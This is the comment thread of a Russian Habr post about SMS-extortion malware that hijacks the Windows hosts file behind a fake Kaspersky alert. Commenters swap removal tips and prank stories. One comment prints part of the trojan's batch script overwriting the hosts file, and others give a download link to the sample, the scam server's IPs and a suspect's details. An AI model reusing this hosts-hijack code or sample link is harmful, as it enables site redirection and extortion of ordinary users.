Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
Хабр доступен 24/7 благодаря поддержке друзей
Комментарии 237
Сегодня любимая обрадовала меня новостью, что и она наконец подхватила вирус, просящий отправить смс. До сих пор думал, что семью ITшника такая штука обойдёт стороной, ан нет — не обошла.Семью айтишника должна была обойти привычка сидеть из-под юзера, которому доступна запись в системные файлы.
Сам я использую linux, а к ноутбуку жены как-то совсем мало подхожу. Но вы, конечно, правы.
многим вирусам пофиг на ограниченную запись.
что за дискриминация.
а как семья айтишника может работать на машине без фулаксесса?
Не хватит терпения!
Не хватит терпения!
Да ладно уж :) У меня жена в XP сидит на юзерском аккаунте. С тех давних пор ни одной подобной проблемы не было. Бывают, конечно, проблемы с какой-нибудь программой, которая криво работает без админских прав, но терпимо. Но то XP, а в более новых версиях виндовса с этим ещё лучше стало, насколько я знаю.
Все изощренней и изощренней.
по мне, так, это очередная тупость школьника, который писал этот «вирус».
«Вирус» не просил отослать смс, а в hosts об этом написано.
Проблема в том, что подобных «вирусов» достаточно много, и антивирусы их зачастую не палят. Благо лечится это все достаточно просто: поиск по exe файлам, созданными в ближайшие часы (дни), и чистки все записей авторана.
«Вирус» не просил отослать смс, а в hosts об этом написано.
Проблема в том, что подобных «вирусов» достаточно много, и антивирусы их зачастую не палят. Благо лечится это все достаточно просто: поиск по exe файлам, созданными в ближайшие часы (дни), и чистки все записей авторана.
возможно это была public beta )) Дальше допишут номер и текст смс. Как всегда для многих прокатит.
ага… «если вы заметили что вирус работает некорректно, свяжитесь с автором по email ....» :)
… свяжитесь с автором. Для этого нужно отправить смс…
Ну вообще такая возможность существует «prefix ВАШ ТЕКСТ», и активно используется в «СМС-спасибо», в роли донейта для сайта, с отображением текстов на странице сайта.
Идея у меня воявилась для вирусописателей: организовать такой мини смс чатик на окне «Ваша система заблокирована», чтоб юзерам скучно не было. Реализуется легко достаточно. Было бы забавно :)
Идея у меня воявилась для вирусописателей: организовать такой мини смс чатик на окне «Ваша система заблокирована», чтоб юзерам скучно не было. Реализуется легко достаточно. Было бы забавно :)
Напомнило:
Здравствуйте, я Белорусский вирус.
По причине ужасной бедности моего создателя и низкого уровня развития технологий в нашей стране я не способен причинить какой-либо вред Вашему компьютеру. Поэтому очень прошу Вас, пожалуйста, сами сотрите какой-нибудь важный для Вас файл, а потом разошлите меня по почте другим адресатам. Заранее благодарю за понимание и сотрудничество.
:)
Здравствуйте, я Белорусский вирус.
По причине ужасной бедности моего создателя и низкого уровня развития технологий в нашей стране я не способен причинить какой-либо вред Вашему компьютеру. Поэтому очень прошу Вас, пожалуйста, сами сотрите какой-нибудь важный для Вас файл, а потом разошлите меня по почте другим адресатам. Заранее благодарю за понимание и сотрудничество.
:)
Прошу прощения за дезинформацию — смс отослать забыли — поправил топик.
изощрённо было, когда у меня под Linux (когда я зашел скачать какую-то музыку) открылся еще один сайт по клику и там было что-то типа окна Мой компьютер и сканирование на вирусы… и понятное дело найдены какие-то трояны :)))
Так? =)
дада… именно это
я сначало 2 секунды ваще не понимал под linux'ом ли я :)) а потом понял, что за фигня
мы с другом 7 лет назад сделали похожу хрень на Pascal (еще в школе было) только под консоль и пошутили над другим челом:
делали лабораторки по пакетным bat файлам в школе (а он не особо в этом разбирался) и незаметно для него вставали в его bat'ник запуск нашей проги, тоже типа имитация сканирования, проверка диска… в итоге потом пришли домой к нему, он сам запустил и процесс пошел… мы минут 10 еле еле сдерживали смех (когда он ходил по квартире и говорил ой господи прошай моя музыка, прощай мой жесткий… прощай мои игры....), и в итоге когда в конце появилась надпись: а теперь можешь выкинуть нахрен свой жесткий, мы дико засмеялись… честно скажу прикол удался, до сих пор шутим
я сначало 2 секунды ваще не понимал под linux'ом ли я :)) а потом понял, что за фигня
мы с другом 7 лет назад сделали похожу хрень на Pascal (еще в школе было) только под консоль и пошутили над другим челом:
делали лабораторки по пакетным bat файлам в школе (а он не особо в этом разбирался) и незаметно для него вставали в его bat'ник запуск нашей проги, тоже типа имитация сканирования, проверка диска… в итоге потом пришли домой к нему, он сам запустил и процесс пошел… мы минут 10 еле еле сдерживали смех (когда он ходил по квартире и говорил ой господи прошай моя музыка, прощай мой жесткий… прощай мои игры....), и в итоге когда в конце появилась надпись: а теперь можешь выкинуть нахрен свой жесткий, мы дико засмеялись… честно скажу прикол удался, до сих пор шутим
УГУ :)))) У меня друг тоже на бат файлах напсал псевдовирус хотел над другом приколотся (но по за парке не тот взял с собой, вирус реально удалял папку windows ещё под Win98) долго мы все вместе потом смеялись востанавливая рабочие файлы его отца (отец в администрации города работал) )))
помню как делал на скорую руку своему знакомому в универе фейк докторвеб ;)
там работала только кнопка F5 по-моему, чтоб начатькопирование схожего диплома сканирование дискеты на вирусы. И когда он заманил однокурсника с похожим на его задание, то забыл что надо нажимать. однокурсник потянулся к мышке, мол давай я ща через меню включу. Наша операция висела на волоске ;) Но в итоге диплом был скопирован, злостный вирус не обнаружен.
Эх, напомнили…
там работала только кнопка F5 по-моему, чтоб начать
Эх, напомнили…
От души посмеялся)
Такие странички нацелены на людей которые думаю что Windows XP единственная и последняя версия ОС. А таких ой как много…
Такие странички нацелены на людей которые думаю что Windows XP единственная и последняя версия ОС. А таких ой как много…
Еще на тех, у кого «модная собрка виндовс ИксПи, она лучше и быстрей этой вашей семерки».
Школота делала, ведь можно же версию ОС на серваке посмотреть в заголовках запроса )
представил себе окошко «Касперского» под мак…
это не касперский. это их антивирус
А он, кстати, есть.
Но зачем?
Чтоб тормозило!
Понастольгировать чтоль? :) Вспомнить времена Windows Xp без сервиспаков, и времена разрешения 1280*1024…
Это вы хорошо жили =). Я ХР начинал использовать с разрешением 1024*768.
да вы тоже зажравшиеся =) я с 800*600
Олигархи начинают с малого.
XP на 800х600? О_о Простите, позвольте усомниться, это как монитор дожил с таким нативным разрешением в 2001 году?
=) не у меня, у родителей, до 2001 года я компьютер вообще не видел, учеба-служба-работа
Ну формально я начинал с ХР на р2 233 снятом с сервера, 256 рам, 20 гиг хард. И работало. И, да, 1024*768, эт потом пошли всякие модные разрешения :)
Знакомые на работе ради интереса вкорячили ХР на р-100 (что за память была не помню- не буду врать). Говорят завелась после отключения «всего и вся». Поставили какой то бабушке в качестве печатной машинки.
alert level — avarage
это шикарно
это шикарно
обожаю когда такое псевдо окно вылетает на линукс системах ))
Да, я бы не сказал, что тут применили какую-то хитрость или мозги.
Все изощренней и изощренней.А по-моему всё примитивней и примитивней…
Или вы во время написания своей реплики поднимали табличку SARCASM?
«вызов программиста» это сильно. Хотя, для простых людей, что админ, что программист — всё едино.
До боли уже избита тема вирусов записывающих себя в hosts…
Ну этот хоть чуточку оригинален :)
Ну этот хоть чуточку оригинален :)
… если у человека ума хватило в hosts залезть, то «программист» ему не нужен…
Я о том же подумал) И сначала решил даже, что раз уж он здесь отметился, то проблема должна быть не здесь. Однако здесь)
столько инфы в инете про этот файл, что даже знакомая девушка сама нагуглила, почему у неё вконтактик не открывается и проверила hosts.
ради вконтаткика люди даже учатся гуглить ;)
ради вконтаткика люди даже учатся гуглить ;)
поисковики то прикрыты в томже хостс так что пришлось бы с другого места гуглить =)
hidemyass.com если вирус сайт заблакировал
ну в том конкретном случае не было с поисковиками проблем.
А еще та девушка как мне сказала, что уже и пробовала анонимайзеры, я вообще сел ;)
А еще та девушка как мне сказала, что уже и пробовала анонимайзеры, я вообще сел ;)
я понял зачем нужны школоло-хацкеры, они учат девушек гуглить =)
а еще программистам помагают к девушкам на ночь ходить «вирусы лечить» ))))))
Жаль, что не отучают работать под админом и добровольно запускать всякую непонятную гадость.
Позорище же в семье IT-шника так вирусы хватать.
Позорище же в семье IT-шника так вирусы хватать.
Менее известные у нас поисковики, вроде yahoo, работают.
Признавайтесь! Как много из Вас попытались пройти по айпишнику в скрине? ;)
Обмен пакетами с 90.188.60.170 по 32 байт:
Ответ от 87.103.164.250: Превышен срок жизни (TTL) при передаче пакета.
Ответ от 87.103.164.250: Превышен срок жизни (TTL) при передаче пакета.
Ответ от 87.103.164.250: Превышен срок жизни (TTL) при передаче пакета.
Ответ от 87.103.164.250: Превышен срок жизни (TTL) при передаче пакета.
…
Ответ от 87.103.164.250: Превышен срок жизни (TTL) при передаче пакета.
Ответ от 87.103.164.250: Превышен срок жизни (TTL) при передаче пакета.
Ответ от 87.103.164.250: Превышен срок жизни (TTL) при передаче пакета.
Ответ от 87.103.164.250: Превышен срок жизни (TTL) при передаче пакета.
…
91.188.60.170
По 91.188.60.171 просят смс.
прикольно: 91.188.60.171/admin/ :)
Не сразу я сообразил сорц-код посмотреть :)
более того… там есть phpmyadmin
после вашего комментария попытался, но avast мне не разрешил :)
Я прошел, код чист.
Фаерфокс ругается: «Имеется информация, что эта веб-страница является мошеннической!»
Нажал игнор, у меня линукс. Страничка безобидная, ничего опасного.
Нажал игнор, у меня линукс. Страничка безобидная, ничего опасного.
А не сказать ли ботнету этот айпишник?..
Кто-нибудь хостеру то напишите в абузу.
Самый основной вопрос, как выглядит файл hosts после перезагрузки. Как правило все записи там появляются снова, т.е. проблема часто глубже, чем просто подчистка файла hosts.
Непонятно только каким боком здесь Касперский.Спонсор?
Так куда смс слать я так и не понял?
Прошу прощения — обновил топик. Было оно при открытии сайта vkontakte.
скажите номер и код
А стоимость смс не 100, а 250 ру
Так это же совсем другие деньги!
полпрограммиста вызвать можно!
пол-программиста :)
Капитан Орфография нежно намекает, что перед согласными (за исключением прописных букв и буквы «л») дефис не ставится =)
www.gramota.ru/class/coach/tbgramota/45_64 — пруфлинк.
www.gramota.ru/class/coach/tbgramota/45_64 — пруфлинк.
Эти вирусы, на идиотов рассчитаны, которые ни бельмеса в компьютерах не понимают. Избавиться от них особых проблем не составляет.
Да, от идиотов достаточно просто изабвиться.
По-моему если вы находитесь в сообществе хабра вы просто обязаны хорошо разбираться в компьютерах! Иначе встает вопрос, что вы тут делаете!
Так ведь Retarded не о себе говорил, а о других жертвах — из гражданского населения.
я — читаю интересные посты =) (ибо я скорее «иначе», чем хорошо разбираюсь))
на хабре много доступного и интересного «простым умам» =)
на хабре много доступного и интересного «простым умам» =)
Вы не сколько не правы. Сейчас я не говорю про себя, но многие заходят почитать сюда не только все околокомьютерное (софт, железо и прочее), а научно-популярное и прочее близкое но напрямую не относящееся к гиковской тематике, и вполне понятное простому смертному.
что-то мне подсказывает, что авто предыдущего комментария должен автоматически становиться идиотом по сравнению с «дядей» Ph.D. (который, к слову, может ничего и соображать в компах)
Больше всего раздражают не обычные спамеры и «рыбаки», а те кто забывают добавить ссылку или номер смс.
Главное, что в этой просьбе даже намек на уважение: на Вы обращается… =)
Непонятно только каким боком здесь Касперский.
Это была ирония? Я думаю всем тут понятно что касперский тут для повышения доверия. Обычные пользователи не могут отличить фейковский алерт от настоящего.
Это была ирония? Я думаю всем тут понятно что касперский тут для повышения доверия. Обычные пользователи не могут отличить фейковский алерт от настоящего.
Сижу в тп, отвечаю на почту.
Получаю письмо: «не могу пользоватся интернетом т.к. „www.vkontakte.ru“ нужно активировать анкету, как сделать это незнаю»
Думаю: че за хрень?
Откладываю письмо на «минут через 20 придумаю».
Открываю Хабр…
Спасибо. =)
Получаю письмо: «не могу пользоватся интернетом т.к. „www.vkontakte.ru“ нужно активировать анкету, как сделать это незнаю»
Думаю: че за хрень?
Откладываю письмо на «минут через 20 придумаю».
Открываю Хабр…
Спасибо. =)
Да не за что. Вы бы и сами догадались быстро) Это ж дело-то житейское)
Я, к сожалению (или к счастью), не большой знаток внутренней жизни вконтакта, а для уже немалого количества пользователей вконтакте (ну или мой мир/одноклассники) является практически синонимом интернета. И заявки «не работает интернет»=«забыл пароль к любимому сайту», увы, уже не редкость. Так что наиболее вероятен был бы ответ в стиле «разбирайтесь сами со своим вконтактом», выраженный в более прилизанной форме.
И только следующее письмо (а не все пишут более развернутые варианты) с более подробным описанием проблемы помогло бы мне понять, где копать.
И только следующее письмо (а не все пишут более развернутые варианты) с более подробным описанием проблемы помогло бы мне понять, где копать.
Я тоже совсем не активный пользователь, но тут дело-то не в самом вконтакте — он лишь источник.
у меня было на прошлой работе начальник любил поиграться в карнейдж (браузерная ммо), так вот я в хост ему прописал на 127,0,0,1. Он мне звонит потом и говорит: «Интернета нету нифига на серваке» =D Хотя вроде как человек был не очень далекий от компов
Кому-либо из комментирующих приходило в голову сообщить страницу вконтакте или номер СМСа куда следует, чтобы к этим быдлохакерам пришли реально, не в компьютер, а в дверь, и задержали бы «до выяснения», чтобы охота отбилась на подольше? Или эта такая привычная реалия, типа, могут в переходе ограбить, такова жизнь и тут ничего не поделаешь?
СМС-партнерки так устроены, что не возбраняют анонимное участие в них и получение денег на анонимные кошельки платежных систем. Не нужно ни паспорта, ни юрлица, ни договра. По моему, сами сотовые операторы и аггрегаторы типа всяких А1 ничего против этого не имеют.
Это заработок СМС билингов это их хлеб… пока законом не запретят.
Не все слова в этом ответе я понял, но, если сотовые и сетевые операторы не имеют ничего против преступников, может, милиция будет иметь? Чисто для смеха? И анонимность кошельков и номеров будет проверена при помощи ордера? Или это фантастика какая-то?
91.188.59.* — прямо-таки подсеть зла! 118 активных вредоносных домена за неким Juris Sahurovs.
Ухтыж блин, местный чувак, получается…
Вобщем, просмотрел, думаю, знакомые ИПшки, и вспомнил, вобщем это домашний провайдер ИЗЗИ (кстати, самый хреновый, что есть), у них IP динамические.
Почему часть подсети кому-то принадлежит, то это скорее по причине того, что ИЗЗИ выкупает маленьких провайдеров, а сети лишь присваивает себе, иногда не переоформляя.
Большую топологию сказать не могу, но в Латвии эти адреса вообще зарегистрированы в Резекне (далеко от Риги) тем не менее, скорее это уже ни о чем не говорит, по вышеуказанной причине.
Вобщем, просмотрел, думаю, знакомые ИПшки, и вспомнил, вобщем это домашний провайдер ИЗЗИ (кстати, самый хреновый, что есть), у них IP динамические.
Почему часть подсети кому-то принадлежит, то это скорее по причине того, что ИЗЗИ выкупает маленьких провайдеров, а сети лишь присваивает себе, иногда не переоформляя.
Большую топологию сказать не могу, но в Латвии эти адреса вообще зарегистрированы в Резекне (далеко от Риги) тем не менее, скорее это уже ни о чем не говорит, по вышеуказанной причине.
Вот еще запись порадовала:
mazatransa.in 91.188.59.84 Eleonore Exploit pack v1.3.2 / TrojanClicker Agent Fedchik Vasiliy Petrovich / hjskl1ze@mail.ru 2010-04-26 details
По адресу hjskl1ze@mail.ru можно увидеть некоего Колю Романова, 22 лет от роду. Разумеется, данные не 100%.
mazatransa.in 91.188.59.84 Eleonore Exploit pack v1.3.2 / TrojanClicker Agent Fedchik Vasiliy Petrovich / hjskl1ze@mail.ru 2010-04-26 details
По адресу hjskl1ze@mail.ru можно увидеть некоего Колю Романова, 22 лет от роду. Разумеется, данные не 100%.
Если бы он не блокировал поисковики, а только всякие дуровы/одноглазники/вк, то я и удалять бы не стал :)
> Отправьте смс и не мучайтесь… Реальная стоимость смски 100 рублей, а вызов программиста рублей 500 минимум:)
сцуко, вот это наглеж, а!
сцуко, вот это наглеж, а!
не только наглеж, это еще и демпинг!!!
Антивирусы спонсоры вирусов ))) вирусы им прибыль приносят.
Последнее время ) Такое ощущение, что не антивирусы пишутся из-за, вирусов, а вируссы для антивирусов. )))
/>вот вам ссылка в руки dr.Web анлокер а если не помогает, то поиск в интернете.
Ну если СМС отправили и с Вам сняли деньги то их можно всегда вернуть заявлением в билинг. Билинг можно найти по номеру в том же яндексе.
Был случай когда я отправил смс для того чтобы скачать файл (ну очень нужен был фаил, стоимость смс написана была 5 руб.) а сняли 600 руб. Поиском в поисковике нашел номер, нашел билинг, написал жалобу в билинг, через неделю вернули на телефон все деньги.
Последнее время ) Такое ощущение, что не антивирусы пишутся из-за, вирусов, а вируссы для антивирусов. )))
/>вот вам ссылка в руки dr.Web анлокер а если не помогает, то поиск в интернете.
Ну если СМС отправили и с Вам сняли деньги то их можно всегда вернуть заявлением в билинг. Билинг можно найти по номеру в том же яндексе.
Был случай когда я отправил смс для того чтобы скачать файл (ну очень нужен был фаил, стоимость смс написана была 5 руб.) а сняли 600 руб. Поиском в поисковике нашел номер, нашел билинг, написал жалобу в билинг, через неделю вернули на телефон все деньги.
> чтобы скачать файл (ну очень нужен был фаил, стоимость смс написана была 5 руб.) а сняли 600 руб
а что не так?
вы реально думали, что кто-то будет снимать 5 рублей?
> через неделю вернули на телефон все деньги
повезло, не у всех так
а что не так?
вы реально думали, что кто-то будет снимать 5 рублей?
> через неделю вернули на телефон все деньги
повезло, не у всех так
В большинстве случаев, услуги СМС-билинга предоставляют зарегистрированные в установленном Законом РФ порядке компании и их работа строго регламентирована. Но, к сожалению не всех своих клиентов они могут отследить (и вообще следить, за что они берут денги) и тут поможет только жалоба в тот билинг чей номер указан.
Конкретно в данном случае (номер 8353, билинг нашел в Яндексе) обратится http://www.a1help.ru/ это официальный СМС-Билинг (А1), и кстати как раз тот, что благополучно вернул мне деньги в течении недели.
Конкретно в данном случае (номер 8353, билинг нашел в Яндексе) обратится http://www.a1help.ru/ это официальный СМС-Билинг (А1), и кстати как раз тот, что благополучно вернул мне деньги в течении недели.
Не все обманывают при скачке файла.
depositfiles.com например честно пишет стоимость gold-аккаунта.
На какой-то другой файлопомойке тоже качал файл, отправлял смс, чтоб быстрее было — тоже сняли обещанное.
Хотя там не 5 рублей было, побольше.
depositfiles.com например честно пишет стоимость gold-аккаунта.
На какой-то другой файлопомойке тоже качал файл, отправлял смс, чтоб быстрее было — тоже сняли обещанное.
Хотя там не 5 рублей было, побольше.
я говорю больше о сумме
ну кто будет 5 рублей снимать? это же сразу выглядит, как бред
для компании трафик дороже будет стоить, чем вы ей заплатите
это из разряда «продам ноутбук за $100», тоже как бы рабочий будет, но…
уважаю сайты, которые сразу пишут, СКОЛЬКО ты им должен заплатить, без всяких наепок и серого текста в 5 пикселей на белом фоне
ну кто будет 5 рублей снимать? это же сразу выглядит, как бред
для компании трафик дороже будет стоить, чем вы ей заплатите
это из разряда «продам ноутбук за $100», тоже как бы рабочий будет, но…
уважаю сайты, которые сразу пишут, СКОЛЬКО ты им должен заплатить, без всяких наепок и серого текста в 5 пикселей на белом фоне
Есть сайты которые дают бесплатно 1 день для того, чтобы скачать файл без ограничений (типа ТурбоБита), при этом не просят отправлять им смс (чтобы Вы не думали что снимут денег), и для доказательства своей честности просят ввести номер и они на него скинут пароль на вход. Только при входе есть Ма-а-а-а-ленька кнопочка называется «ПРАВИЛА» так вот в правилах написано (а обычно их никто не читает), что если ты не отпишешься в течении суток то следующая подписка состовляет 180 руб 4 дня. И каждые 4 дня с тебя будут списывать 180 руб. Развод. Законный. На нашем не желании читать правила.
П.С, при этом когда каждые 4 дня смс приходит «спасибо что продлили наш сервис ваш новый пароль xxxxxx» там не у казано за что и как от этого избавится
П.С, при этом когда каждые 4 дня смс приходит «спасибо что продлили наш сервис ваш новый пароль xxxxxx» там не у казано за что и как от этого избавится
все такие вещи построены исключительно на человеческом невнимании, глупости и жадности, желании наживы
я никогда не поверю, что за 5 рублей мне дадут скачать гигабайтные файлы на супер-скорости, потому что я знаю, сколько стоят каналы и оборудование
вот про «Ма-а-а-а-ленька кнопочкy» я и говорил, но это НЕ законно, это, пардон, наебалово чистой воды, ибо законом предусмотрено НОРМАЛЬНОЕ получение человеком (покупателем то есть) важной информации при сделке, вся же важная информация («завтра мы натянем вас на бабки») скрыта так, что еще нужно постараться, чтобы ее найти
я никогда не поверю, что за 5 рублей мне дадут скачать гигабайтные файлы на супер-скорости, потому что я знаю, сколько стоят каналы и оборудование
вот про «Ма-а-а-а-ленька кнопочкy» я и говорил, но это НЕ законно, это, пардон, наебалово чистой воды, ибо законом предусмотрено НОРМАЛЬНОЕ получение человеком (покупателем то есть) важной информации при сделке, вся же важная информация («завтра мы натянем вас на бабки») скрыта так, что еще нужно постараться, чтобы ее найти
Когда один фаил ищеш в нете несколько часов… то начинаешь и 5ти рублям верить лиж бы его скачать уже и пойти пить пиво.
Раз вернули Вам деньги, Вы должны были вернуть файл. Закачали обратно или зажали?
нужно было добавить в начале " — Ну пожалуйста, ...." и в конце, "… Будьте людьми, нам тоже кушать хочется."
А где эту дрянь подцепили? Есть какие-нибудь сведения?
Ссылку в топике выложил, но она уже нерабочая. Группу засуспендили
Вот увидел у нескольких человек на стенах.
Контакт пишет, что вирус
vkontakte.ru/away.php?to=http%3A%2F%2Fdepositfiles.com%2Ffiles%2Fek1kwkz5h
Депозит молча дает скачать
depositfiles.com/files/ek1kwkz5h
Контакт пишет, что вирус
vkontakte.ru/away.php?to=http%3A%2F%2Fdepositfiles.com%2Ffiles%2Fek1kwkz5h
Депозит молча дает скачать
depositfiles.com/files/ek1kwkz5h
CureIt ничего не находит, а зря =(
А внутри обнаружился текст примерно такого содержания на 238 строк
;troy.bat0 16475
@echo off
echo 145.1.0.1 www.smsrent.ru > %windir%\system32\drivers\etc\hosts
echo 145.1.0.1 vkrugudruzei.ru >> %windir%\system32\drivers\etc\hosts
echo 145.1.0.1 www.mamba.ru >> %windir%\system32\drivers\etc\hosts
echo 145.1.0.1 liveinternet.ru >> %windir%\system32\drivers\etc\hosts
echo 145.1.0.1 www.webmoney.ru >> %windir%\system32\drivers\etc\hosts
echo 145.1.1.1 www.gogo.ru >> %windir%\system32\drivers\etc\hosts
…
echo 145.1.0.1 www.smspartner.ru >> %windir%\system32\drivers\etc\hosts
;troy.bat0 16475
@echo off
echo 145.1.0.1 www.smsrent.ru > %windir%\system32\drivers\etc\hosts
echo 145.1.0.1 vkrugudruzei.ru >> %windir%\system32\drivers\etc\hosts
echo 145.1.0.1 www.mamba.ru >> %windir%\system32\drivers\etc\hosts
echo 145.1.0.1 liveinternet.ru >> %windir%\system32\drivers\etc\hosts
echo 145.1.0.1 www.webmoney.ru >> %windir%\system32\drivers\etc\hosts
echo 145.1.1.1 www.gogo.ru >> %windir%\system32\drivers\etc\hosts
…
echo 145.1.0.1 www.smspartner.ru >> %windir%\system32\drivers\etc\hosts
Контакт и при переходе на сам депозит ругается оО
Хм… а разве антивирусы не следят за hosts? За реестром же вроде давно наблюдают…
Тот же CureIT вроде сразу просекал, что hosts модифицирован… Неужели он один за этим смотрит :)
Тот же CureIT вроде сразу просекал, что hosts модифицирован… Неужели он один за этим смотрит :)
У меня к примеру в host свои записи. Виртуальные сервера запускаю для теста. И тот же CureIT мне на это жалуется. Поэтому я даже не обращаю внимания когда он мне об этом говорит и предлагает вернутся к дефу.
Так я не о том, что он должен быть по дефолту постоянно, я о том, почему они не замечают сам факт редактирования. Ессно CureIT не может за этим следить, а вот другие антивирусы следят (как за реестром)?
Точно не скажу, но у меня либо UAC, либо Outpost начинает орать когда неведома программа пытается внести изменения в реестр и системные папки. Но это я смотрю на предупреждения. Жена же сначала нажмет, а потом вечером скажет: Там какая то фигня выскакивала.
У меня в висте простой пользователь не может писать в hosts по-умолчанию
Чтобы его изменить надо права админа
Пользователь с правами администратора имеет пароль и uac просит ввести пароль.
Пароль «кто попало» не знает.
Рекомендую вам сделать так-же и никакие левые «вирусы» не будут портить вам hosts и жизнь :)
Чтобы его изменить надо права админа
Пользователь с правами администратора имеет пароль и uac просит ввести пароль.
Пароль «кто попало» не знает.
Рекомендую вам сделать так-же и никакие левые «вирусы» не будут портить вам hosts и жизнь :)
я риал уссался просто над текстом в хостах )))))))))
За яйца подвесить шутников и когда шутливость иссякнет, забить камнями, закопав в землю по пояс.
Вот после этого можно и посмеяться :)
Вот после этого можно и посмеяться :)
#Отправьте смс и не мучайтесь… Реальная стоимость смски 100 рублей, а вызов программиста рублей 500 минимум:)
это где ж такое пиво дорогое?
А чего б не повалить сервак нафиг? Или может кто покруче найдется, хакнет сервак, загрузит на него ехешник, который будет обратно восстанавливать хостс =))))
Нет уж, спасибо. Вирусы иногда пишутся и из интересу, а не для выгоды. Да и вирусы разные бывают.
Один мой знакомый альтруизма и интереса ради написал свой «вирус», который уничтожал другой вирус и выводил окошко о том, что он это сделал. Это он так компы в одной конторе лечил, а затем и в Интернет его выпустил :)
Что произошло потом?
Контору от вируса вылечил и получил приличную надбавку и несколько неофициальных отгулов, а судьбу попавшей в Интернет версии он не отслеживал :(
Однако сам тот факт, что можно написать вирус, который будет эксплуатировать те же уязвимости, но с благородными целями — уже достаточный для того, чтобы задуматься является ли эксплуатация уязвимостей систем однозначным преступлением :)
Однако сам тот факт, что можно написать вирус, который будет эксплуатировать те же уязвимости, но с благородными целями — уже достаточный для того, чтобы задуматься является ли эксплуатация уязвимостей систем однозначным преступлением :)
Было как-то давно: я читал рассказ, в котором рассказывалось о том, как появился искусственный интеллект. В своё время проводились турниры между вирусами: выделялась машинка и туда пускали толпу разнообразных вирусов, которые бились друг с другом до победного. И в таких компьютерах зарождались другие формы электронной жизни, которые со временем эволюционировали до ИИ. Ну как-то так — пересказчик я неважный)
Один мой знакомый альтруизма и интереса ради написал свой «вирус», который уничтожал другой вирус и выводил окошко о том, что он это сделал.В 2003 году в MS Windows открылась серьёзная уязвимость RPC, и началась обширная эпидемия червя MSBlast (он же Blaster Worm, Lovsan, Lovesan), использовавшего эту уязвимость. И тогда в разгар этой эпидемии появился друго червь Welchia, который проникал в систему через ту же уязвимость и пытался скачать и установить там патч от Microsoft, который закрывал эту уязвимость.
Но антивирусы его тоже считали вирусом и удаляли (всё же он для распространения эксплуатировал дыры в системе).
Вот такие вирусы ещё можно назвать заботливыми, но ни как не тот, котором пишет автор в топике.
Самое интересное, что у номера 8353 есть вполне определённый владелец.
Теперь о правде жизни, в случае не с таким горе-вирусом, а при телефонном вымогательстве «Ребёнок помирает..., подробности телефон такой то...» при звонке снимается N-средств и идёт отбой.
Показал это знакомой — журналистке КП. Последствием стало мини-расследование. Сотовый оператор сообщает, что да, номер коммерческий, но сообщить — на кого оформлен может только органам (тут он прав, с точки зрения закона, хотя, понятное дело — половина от суммы идёт на проценты оператору). Но самое интересное, милиция, тоже ручки разводит, «а зачем вы звонили?». А юрист подтверждает, что будут проблемы с доказательной базой, что один и тот же человек распространяет вирус/спам — и является владельцем телефона.
Такие телефоны, в том числе 8353, всплывают постоянно в связи с разными схемами мошенничества и вымогательства.
Теперь о правде жизни, в случае не с таким горе-вирусом, а при телефонном вымогательстве «Ребёнок помирает..., подробности телефон такой то...» при звонке снимается N-средств и идёт отбой.
Показал это знакомой — журналистке КП. Последствием стало мини-расследование. Сотовый оператор сообщает, что да, номер коммерческий, но сообщить — на кого оформлен может только органам (тут он прав, с точки зрения закона, хотя, понятное дело — половина от суммы идёт на проценты оператору). Но самое интересное, милиция, тоже ручки разводит, «а зачем вы звонили?». А юрист подтверждает, что будут проблемы с доказательной базой, что один и тот же человек распространяет вирус/спам — и является владельцем телефона.
Такие телефоны, в том числе 8353, всплывают постоянно в связи с разными схемами мошенничества и вымогательства.
Очередной троян hosts-подменитель, как это было в июле с той самой нашумевшей историей про угон кучи аккаунтов.
А еще там есть 91.188.60.171:2222/ :)
Я бы за 400 вызвался. :-)
Года три назад опыта и интереса ради написал простенький .com, который патчил файл hosts и перенаправлял с популярных сайтов на 127.0.0.1.
Цели мои были просты: я прихожу к приятной и красивой девушке починить комп, незаметно от неё запускаю файл и либо остаюсь таким образом на большее время, когда «мосты уже разведены и домой не добраться» (универсальная питерская отмаза :), либо еще возвращаюсь…
Позже я, конечно, раскаялся в своих намерениях и решил, что никогда не буду так поступать.
Да и так у меня и не хватило наглости воспользоваться этим файликом, зато для себя я навсегда запомнил путь к файлу hosts и вообще метод работы вирусов такого типа.
Цели мои были просты: я прихожу к приятной и красивой девушке починить комп, незаметно от неё запускаю файл и либо остаюсь таким образом на большее время, когда «мосты уже разведены и домой не добраться» (универсальная питерская отмаза :), либо еще возвращаюсь…
Позже я, конечно, раскаялся в своих намерениях и решил, что никогда не буду так поступать.
Да и так у меня и не хватило наглости воспользоваться этим файликом, зато для себя я навсегда запомнил путь к файлу hosts и вообще метод работы вирусов такого типа.
Почему вы раскаились? Вы ведь преследовали не какие-то страшные цели и вреда не было от ваших действий.
В романе-антиутопии Джорджа Оруела 1984 это называется «мыслепреступлением».
Одному тому факту, что я написал «вирус», способный причинить вред людям уже хватило для того, чтобы устыдить самого себя :)
Дальше уже писались шуточные программы-установщики популярных и ожидаемых игр, которые распространялись только на первое апреля, только среди знакомых, а подложная ошибка установки «Fatal Error: exeption (0x0104)» объяснялась знакомым уже через пять минут мозгового штурма как число и месяц — на большее совесть не дает идти :)
Одному тому факту, что я написал «вирус», способный причинить вред людям уже хватило для того, чтобы устыдить самого себя :)
Дальше уже писались шуточные программы-установщики популярных и ожидаемых игр, которые распространялись только на первое апреля, только среди знакомых, а подложная ошибка установки «Fatal Error: exeption (0x0104)» объяснялась знакомым уже через пять минут мозгового штурма как число и месяц — на большее совесть не дает идти :)
Буквально недели две назад читал 1984. Вот только мыслепреступлением там было, когда твои мысли шли в разрез с «политикой партии». Отличное, кстати произведение.
Я не вижу в этом вреда. Это предлог. Тем более вы всё исправляли. Впрочем, дело-то, конечно, ваше)
Хорошая шутка на 1 апреля)
Я не вижу в этом вреда. Это предлог. Тем более вы всё исправляли. Впрочем, дело-то, конечно, ваше)
Хорошая шутка на 1 апреля)
Если Вам понравился «1984», то вполне вероятно, что придется по вкусу «Мы» соотечественника Замятина и «Скотный двор» того же Оруела. Еще есть гениальный Олдос Хаксли и его «О дивный новый мир!» с впадением в противоположную крайность, но схожим результатом. А также есть примечательное ru.wikipedia.org/wiki/THX_1138
Да, вреда-то особого и нет, но… возможно я слишком осторожничаю со своей совестью, полагая, что грань между невинными шутками и серьезными преступлениями вроде финансовых махинаций, промышленного шпионажа и саботажа крайне тонка :)
